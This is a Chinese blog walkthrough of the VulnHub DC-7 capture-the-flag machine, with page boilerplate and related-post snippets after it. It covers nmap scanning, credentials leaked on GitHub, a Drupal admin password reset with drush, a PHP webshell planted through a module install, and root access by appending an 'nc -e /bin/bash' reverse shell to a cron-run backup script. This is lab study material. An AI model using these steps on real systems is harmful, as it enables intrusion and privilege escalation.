vulnhub靶机渗透DC-7

最新推荐文章于 2024-05-23 16:43:36 发布
最新推荐文章于 2024-05-23 16:43:36 发布
阅读量53 收藏
点赞数
分类专栏: 靶机笔记 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129616860
版权

靶机入侵——DC7

1、环境搭建

下载地址:http://www.vulnhub.com/entry/dc-7,356/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
    在这里插入图片描述
    ​ 192.168.80.136 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.136
    在这里插入图片描述
    ​ 发现开放了80、22端口

  • web端进一步信息收集

    通过wappalyzer 插件我们收集到站点的cms、中间件、语言等信息
    在这里插入图片描述

3、漏洞探测与利用

  • 网站页面提示我们:不是技术性的?跳出框框去思考?
    在这里插入图片描述

  • 如果不能从框架上找突破口,且不是技术性的问题。那么可能是信息泄露,有时在实际项目中,目标可能使用一些开源项目,我们可以从GITHUB上找到突破口。我们注意到页面有“@DC7USER” ,这可能是项目作者id。我们在github上搜索一下。
    在这里插入图片描述

  • 果然我们找到了一些线索,继续查看我们发现config.php文件夹下存在账户信息:dc7user/MdR3xOgB7#dW
    在这里插入图片描述

  • 使用账户信息成功ssh登录

4、权限提升

  • 尝试免密使用root级别命令和suid提权失败
    在这里插入图片描述

  • 查找本用户目录下有没有突破点

    进入backups文件夹,发现两个文件,但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码。

    发现在mbox中记录着root的定时任务,项目位置为/opt/scripts/backups.sh
    在这里插入图片描述

  • 查看一下/opt/scripts/backups.sh
    在这里插入图片描述

  • 如果这个文件可写,那么直接就可以反弹shell提权了。使用ls -l看一下权限,发现只有root和www-data可写。
    在这里插入图片描述

  • 这条路行不通,那仔细看一下backups.sh里面的命令

    gpg命令是用来加密文件的,加密后的文件都是乱码

    drush是一个简化了创建和管理Drupal8网站的命令行工具

  • 查看drush,参考链接:https://zhuanlan.zhihu.com/p/60880048
    在这里插入图片描述

  • 进入/var/www/html,尝试修改www-data的密码

    	drush upwd admin --password="123456"

  • 成功修改,登录网站后台
    在这里插入图片描述
    在这里插入图片描述

  • 进入后台,寻找注入点。发现在Content => Add content =>Basic page处似乎可以写shell。
    在这里插入图片描述

  • 但没发现php代码选项。百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入。进入Extend => Install new module,输入php模块包的url:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • 安装后,修改主页内容。插入一句话木马
    在这里插入图片描述
    在这里插入图片描述

  • 蚁剑连接后,反弹shell。利用python获得交互式shell:python -c “import pty;pty.spawn(‘/bin/bash’)”
    在这里插入图片描述

  • 接下来我们利用root的定时任务进行提权。我们可以写个反弹shell的命令下去:

    echo "nc -e /bin/bash 192.168.80.130 10087" >> /opt/scripts/backups.sh

在这里插入图片描述

  • 等待定时任务启动,即可获得root权限。成功拿到flag
    在这里插入图片描述
不要温顺地走进那个良夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3485
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2364
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2839
Vulnhub靶机渗透学习——DC-9
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 243
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vulnhub靶机渗透测试DC-2靶机渗透
m0_62008601的博客
04-29 1367
攻击机-kali-IP:192.168.56.102 靶机-dc2-ip:192.168.103 关于我的这两台机子的网络设置在上一篇文章中已经提到,这里就不再叙述。 查找dc-2 的IP arp-scan-l 得到ip为192.168.56.103 扫描开启的端口 nmap -sV -p- 192.168.56.103 此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22) 因为开启了80端口,此时我们可以去访问它的web服务 此
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2452
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1824
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3333
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
Vulnhub靶机渗透测试——DC-5
Cobra的博客
05-11 979
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.184 靶机下载地址: 二、信息收集 1、使用nmap进行存活主机探测 nmap 192.168.189.0/24 2、发现IP192.168.189.184开放80,111端口,再次使用nmap对其进行扫描 nmap 192.168.189.184 -sV -T4 -A -p- 3、访问其80端口 4、浏览页面并没有发现可以进行漏洞利用的地方,使用
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8236
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
面对网络安全隐患该如何去做呢?
最新发布
m0_73514785的博客
05-23 362
由于主动式集线器与交换机不通过广播方式进行数据包的转发,嗅探技术也只针对共享式的网络起作用,因此,可以通过交换机的使用,对网络进行分段,最大程度地防止网络技术地攻击,即使受到嗅探技术地入侵,也只能攻击到一部分的信息流。其实伪基站不会连接到运营商的真实网络,它只是自动测量出其所在区域运营商基站所用的广播控制信道频点,然后将测量到的频点和短信内容输入到伪基站的操作平台上,批量群发短信,并且可以在接收方的短信上任意编造主叫号码。开启这些防护设备的网络,可实现对网络层的访问控制,是上网安全的重要保障。
网络安全等级保护2.0(等保)是什么
weixin_45840241的博客
05-20 984
通俗来讲就是:公司或者单位因为要用互联网,但是网上有坏人,我们不仅要防御外部坏人,还要看看咱的管家、工人(管理人员)保安,有没有不锁门、有没有关灯、有没有乱抽烟乱扔烟头,隔一段时间就对这些进行检查、评比,发现问题抓紧处理改进,确保咱家人和财产的安全,防患于未然。虽说跟人的体检差不多,但是对于企业也是一笔不少支出,那为啥必须要做。测评机构对信息系统等级测评,形成测评报告,全云在线提供等保测评服务,提供阿里云平台的合规资质证明,辅导用户测评整改,整改后,测评机构对系统等级符合性状况进行测评,出具测评报告。
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 753
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值